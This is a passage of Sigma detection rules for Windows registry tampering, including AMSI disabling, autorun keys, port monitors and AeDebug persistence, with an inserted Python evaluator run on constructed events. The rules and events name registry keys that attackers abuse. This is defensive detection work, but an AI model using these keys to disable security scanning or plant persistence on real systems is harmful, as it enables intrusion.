    "content": "title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback\nid: 4d431012-2ab5-4db7-a84e-b29809da2172\nstatus: test\ndescription: Detects enabling of the \"AllowAnonymousCallback\" registry value, which allows a remote connection between computers that do not have a trust relationship.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista\nauthor: X__Junior (Nextron Systems)\ndate: 2023-11-03\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml",
    "content": "title: Registry Persistence via Service in Safe Mode\nid: 1547e27c-3974-43e2-a7d7-7f484fb928ec\nstatus: test\ndescription: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network\nauthor: frack113\ndate: 2022-04-04\nmodified: 2025-10-22\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Control\\SafeBoot\\Minimal\\'\n            - '\\Control\\SafeBoot\\Network\\'\n        TargetObject|endswith: '\\(Default)'\n        Details: 'Service'\n    filter_optional_sophos:\n        Image: 'C:\\WINDOWS\\system32\\msiexec.exe'\n        TargetObject|endswith:\n            - '\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)'\n            - '\\Control\\SafeBoot\\Network\\SAVService\\(Default)'\n    filter_optional_mbamservice:\n        Image|endswith: '\\MBAMInstallerService.exe'\n        TargetObject|endswith: '\\MBAMService\\(Default)'\n        Details: 'Service'\n    filter_optional_hexnode:\n        Image: 'C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n        TargetObject|endswith:\n            - '\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)'\n            - '\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)'\n            - '\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)'\n            - '\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)'\n        Details: 'Service'\n    condition: selection and not 1 of 
filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows Add Registry Value to Load Service in Safe Mode without Network\n      technique: T1112\n      atomic_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5\n    - type: atomic-red-team\n      name: Windows Add Registry Value to Load Service in Safe Mode with Network\n      technique: T1112\n      atomic_guid: c173c948-65e5-499c-afbe-433722ed5bd4\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_add_port_monitor.yml",
    "content": "title: Add Port Monitor Persistence in Registry\nid: 944e8941-f6f6-4ee8-ac05-1c224e923c0e\nstatus: test\ndescription: |\n    Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\n    A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md\nauthor: frack113\ndate: 2021-12-30\nmodified: 2024-03-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Control\\Print\\Monitors\\'\n        Details|endswith: '.dll'\n    filter_optional_cutepdf:\n        Image: 'C:\\Windows\\System32\\spoolsv.exe'\n        TargetObject|contains: '\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver'\n        Details: 'cpwmon64_v40.dll'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_optional_monvnc:\n        TargetObject|contains: '\\Control\\Print\\Monitors\\MONVNC\\Driver'\n    filter_optional_vnc:\n        TargetObject|contains|all:\n            - 'Control\\Print\\Environments\\'\n            - '\\Drivers\\'\n            - '\\VNC Printer'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Add Port Monitor persistence in Registry\n      technique: T1547.010\n      atomic_guid: d34ef297-f178-4462-871e-9ce618d44e50\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml",
    "content": "title: Add Debugger Entry To AeDebug For Persistence\nid: 092af964-4233-4373-b4ba-d86ea2890288\nstatus: test\ndescription: Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes\nreferences:\n    - https://persistence-info.github.io/Data/aedebug.html\n    - https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger'\n        Details|endswith: '.dll'\n    filter:\n        Details: '\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of the key to setup a debugger. Which is often the case on developers machines\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml",
    "content": "title: Allow RDP Remote Assistance Feature\nid: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b\nstatus: test\ndescription: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp'\n        Details: DWORD (0x00000001)\n    condition: selection\nfalsepositives:\n    - Legitimate use of the feature (alerts should be investigated either way)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Allow RDP Remote Assistance Feature\n      technique: T1112\n      atomic_guid: 86677d0e-0b5e-4a2b-b302-454175f9aa9e\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml",
    "content": "title: Potential AMSI COM Server Hijacking\nid: 160d2780-31f7-4922-8b3a-efce30e63e96\nstatus: test\ndescription: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless\nreferences:\n    - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)'\n    filter:\n        Details: '%windir%\\system32\\amsi.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_amsi_disable.yml",
    "content": "title: AMSI Disabled via Registry Modification\nid: aa37cbb0-da36-42cb-a90f-fdf216fc7467\nrelated:\n    - id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981 # Windows AMSI Related Registry Tampering Via CommandLine\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.\n    Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.\n    Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.\nreferences:\n    - https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d\n    - https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\n    - https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1562.006\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: AMSI Bypass - Create AMSIEnable Reg Key\n      technique: T1562.001\n      atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml",
    "content": "title: Classes Autorun Keys Modification\nid: 9df5f547-c86a-433e-b533-f2794357e242\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_classes_base:\n        TargetObject|contains: '\\Software\\Classes'\n    selection_classes_target:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - '\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\Shellex\\ColumnHandlers'\n            - '\\Filter'\n            - '\\Exefile\\Shell\\Open\\Command\\(Default)'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\.exe'\n            - '\\.cmd'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    filter_main_drivers:\n   
     Image: 'C:\\Windows\\System32\\drvinst.exe'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_svchost:\n        Image: 'C:\\Windows\\System32\\svchost.exe'\n        # If more targets are found from \"svchost\". Please exclude the whole image\n        TargetObject|contains: '\\lnkfile\\shellex\\ContextMenuHandlers\\'\n    filter_optional_msoffice:\n        Details: '{807583E5-5146-11D5-A672-00B0D022E945}'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml",
    "content": "title: Common Autorun Keys Modification\nid: f59c3faf-50f3-464b-9f4c-1b67ab512d99\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\n    - https://persistence-info.github.io/Data/userinitmprlogonscript.html # UserInitMprLogonScript\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart'\n            - '\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect'\n            - '\\SYSTEM\\Setup\\CmdLine'\n            - '\\Software\\Microsoft\\Ctf\\LangBarAddin'\n            - '\\Software\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Classes\\Protocols\\Handler'\n            - '\\SOFTWARE\\Classes\\Protocols\\Filter'\n            - '\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)'\n            - 
'\\Environment\\UserInitMprLogonScript'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe'\n            - '\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks'\n            - '\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components'\n            - '\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32'\n            - '\\Control Panel\\Desktop\\Scrnsave.exe'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n    filter_optional_msoffice:\n        - TargetObject|contains:\n              - '\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler\\'\n              - '\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler\\'\n        - Details:\n              - '{314111c7-a502-11d2-bbca-00c04f8ec294}'\n              - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}'\n              - '{42089D2D-912D-4018-9087-2B87803E93FB}'\n              - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}'\n              - '{807583E5-5146-11D5-A672-00B0D022E945}'\n    filter_optional_chrome:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}'\n    filter_optional_edge:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}'\n    filter_optional_IE:\n        TargetObject|contains: '\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}'\n    filter_optional_integrator:\n        Image:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_optional_office:\n        Image|startswith:\n            - 'C:\\Program Files\\Common 
Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml",
    "content": "title: CurrentControlSet Autorun Keys Modification\nid: f674e36a-4b91-431e-8aef-f8a96c2aca35\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    system_control_base:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control'\n    system_control_keys:\n        TargetObject|contains:\n            - '\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram'\n            - '\\Terminal Server\\Wds\\rdpwd\\StartupPrograms'\n            - '\\SecurityProviders\\SecurityProviders'\n            - '\\SafeBoot\\AlternateShell'\n            - '\\Print\\Providers'\n            - '\\Print\\Monitors'\n            - '\\NetworkProvider\\Order'\n            - '\\Lsa\\Notification Packages'\n            - '\\Lsa\\Authentication Packages'\n            - '\\BootVerificationProgram\\ImagePath'\n    filter_empty:\n        Details: '(Empty)'\n    filter_cutepdf:\n        Image: 'C:\\Windows\\System32\\spoolsv.exe'\n        TargetObject|contains: '\\Print\\Monitors\\CutePDF Writer Monitor'\n        Details:\n            - 'cpwmon64_v40.dll'\n            - 'CutePDF Writer'\n    filter_onenote:\n        Image: C:\\Windows\\System32\\spoolsv.exe\n        TargetObject|contains: 
'Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n        TargetObject|endswith: '\\NetworkProvider\\Order\\ProviderOrder'\n    filter_realvnc:\n        Image: 'C:\\Windows\\System32\\spoolsv.exe'\n        TargetObject|endswith: '\\Print\\Monitors\\MONVNC\\Driver'\n        Details: 'VNCpm.dll'\n    condition: all of system_control_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
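An added example, not SigmaHQ's code and not a Sigma backend such as pySigma: a small Python evaluator for the condition shape every rule in this family shares, `all of <selection>_* and not 1 of filter_*`, run over constructed Sysmon Event ID 13 (`registry_set`) records. It implements only the modifiers these rules use (`contains`, `startswith`, `endswith`, `all`, exact match and a `null` value meaning "field absent") and reproduces Sigma's case-insensitive string matching; wildcards and backslash escaping are not handled. The detection block is the CurrentControlSet rule above with three of its filters transcribed; every image path, key and `Details` string in the sample events is made up for the illustration.

```python
# Added example (not SigmaHQ code): evaluates the ASEP rule condition
# "all of <selection>_* and not 1 of filter_*" over constructed registry_set events.


def _match_value(field_value, mods, pattern):
    """Compare one event field against one rule value under the given modifiers."""
    if pattern is None:                       # YAML 'null' matches an absent field
        return field_value is None
    if field_value is None:
        return False
    fv, pat = str(field_value).lower(), str(pattern).lower()   # Sigma matching is case-insensitive
    if "contains" in mods:
        return pat in fv
    if "startswith" in mods:
        return fv.startswith(pat)
    if "endswith" in mods:
        return fv.endswith(pat)
    return fv == pat                          # no modifier: exact match


def match_field(event, key, value):
    """'Field|mod1|mod2: value-or-list'. List values are OR-ed unless 'all' is present."""
    field, *mods = key.split("|")
    patterns = value if isinstance(value, list) else [value]
    hits = [_match_value(event.get(field), mods, p) for p in patterns]
    return all(hits) if "all" in mods else any(hits)


def match_selection(event, selection):
    """A mapping is AND over its fields; a list of mappings is OR over them."""
    if isinstance(selection, list):
        return any(match_selection(event, s) for s in selection)
    return all(match_field(event, k, v) for k, v in selection.items())


def evaluate(detection, event, selection_prefix, filter_prefix="filter"):
    """Condition: all of <selection_prefix>* and not 1 of <filter_prefix>*."""
    selections = [v for k, v in detection.items() if k.startswith(selection_prefix)]
    filters = [v for k, v in detection.items() if k.startswith(filter_prefix)]
    return (all(match_selection(event, s) for s in selections)
            and not any(match_selection(event, f) for f in filters))


# Detection block of "CurrentControlSet Autorun Keys Modification"
# (f674e36a-4b91-431e-8aef-f8a96c2aca35), transcribed with three of its five filters.
CURRENTCONTROLSET = {
    "system_control_base": {"TargetObject|contains": r"\SYSTEM\CurrentControlSet\Control"},
    "system_control_keys": {"TargetObject|contains": [
        r"\Terminal Server\WinStations\RDP-Tcp\InitialProgram",
        r"\Terminal Server\Wds\rdpwd\StartupPrograms",
        r"\SecurityProviders\SecurityProviders",
        r"\SafeBoot\AlternateShell",
        r"\Print\Providers",
        r"\Print\Monitors",
        r"\NetworkProvider\Order",
        r"\Lsa\Notification Packages",
        r"\Lsa\Authentication Packages",
        r"\BootVerificationProgram\ImagePath",
    ]},
    "filter_empty": {"Details": "(Empty)"},
    "filter_poqexec": {"Image": r"C:\Windows\System32\poqexec.exe",
                       "TargetObject|endswith": r"\NetworkProvider\Order\ProviderOrder"},
    "filter_realvnc": {"Image": r"C:\Windows\System32\spoolsv.exe",
                       "TargetObject|endswith": r"\Print\Monitors\MONVNC\Driver",
                       "Details": "VNCpm.dll"},
}

# Constructed Sysmon EID 13 events; paths, key names and values are hypothetical.
EVENTS = {
    # LSA notification package (password-filter DLL) registered from a user-writable path
    "lsa_package": {"Image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
                    "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages",
                    "Details": "scecli lsahelper"},
    # Servicing stack rewriting ProviderOrder: suppressed by filter_poqexec
    "poqexec_order": {"Image": r"C:\Windows\System32\poqexec.exe",
                      "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder",
                      "Details": "RDPNP,LanmanWorkstation,webclient"},
    # Same image, different key: a filter ANDs its fields, so the image alone does not suppress
    "poqexec_lsa": {"Image": r"C:\Windows\System32\poqexec.exe",
                    "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages",
                    "Details": "msv1_0 custom"},
    # Spooler registering a print monitor DLL that is not the RealVNC one
    "rogue_monitor": {"Image": r"C:\Windows\System32\spoolsv.exe",
                      "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port\Driver",
                      "Details": "mon.dll"},
    # Value cleared: suppressed by filter_empty
    "cleared": {"Image": r"C:\Windows\regedit.exe",
                "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell",
                "Details": "(Empty)"},
    # Under the Control subtree but not an autostart key
    "unrelated": {"Image": r"C:\Windows\System32\svchost.exe",
                  "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Power\HibernateEnabled",
                  "Details": "DWORD (0x00000000)"},
}


def run(rule=CURRENTCONTROLSET, events=EVENTS):
    """Return {event_name: fired?} for the rule over the sample events."""
    return {name: evaluate(rule, ev, "system_control") for name, ev in events.items()}


if __name__ == "__main__":
    for name, fired in run().items():
        print(f"{name:15s} {'ALERT' if fired else 'ok'}")
```

The `poqexec_lsa` case is the one worth keeping in mind when tuning: each `filter_*` block is an AND of its fields, so a filter keyed on `Image` plus `TargetObject` only suppresses that exact pairing, and adding an image-only filter to quiet noise widens the blind spot to every key the rule covers. The same evaluator runs the other rules in this family unchanged once their selection prefix (`selection_`, `session_manager`, `scripts`, `winsock_parameters`, `ie`) is passed in.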
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml",
    "content": "title: CurrentVersion Autorun Keys Modification\nid: 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\n    - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion'\n    selection_current_version_keys:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run\\'\n            - '\\RunOnce\\'\n            - '\\RunOnceEx\\'\n            - '\\RunServices\\'\n            - '\\RunServicesOnce\\'\n            - '\\Policies\\System\\Shell'\n            - '\\Policies\\Explorer\\Run'\n            - '\\Group Policy\\Scripts\\Startup'\n            - '\\Group Policy\\Scripts\\Shutdown'\n            - '\\Group Policy\\Scripts\\Logon'\n            - '\\Group Policy\\Scripts\\Logoff'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n            - 
'\\Authentication\\PLAP Providers'\n            - '\\Authentication\\Credential Providers'\n            - '\\Authentication\\Credential Provider Filters'\n    filter_main_generic_all:\n        - Details: '(Empty)'\n        - TargetObject|endswith: '\\NgcFirst\\ConsecutiveSwitchCount'\n        - Image|endswith:\n              - '\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe' # C:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\n              - '\\AppData\\Roaming\\Spotify\\Spotify.exe'\n              - '\\AppData\\Local\\WebEx\\WebexHost.exe'\n        - Image:\n              - 'C:\\WINDOWS\\system32\\devicecensus.exe'\n              - 'C:\\Windows\\system32\\winsat.exe'\n              - 'C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n              - 'C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n              - 'C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe'\n              - 'C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe'\n              - 'C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe'\n              - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe'\n              - 'C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe'\n              - 'C:\\Program Files\\Everything\\Everything.exe'\n              - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n              - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_main_null:\n        Details: null\n    filter_main_logonui:\n        Image: 'C:\\Windows\\system32\\LogonUI.exe'\n        TargetObject|contains:\n            - '\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\'  # PIN\n            - '\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}\\'  # 
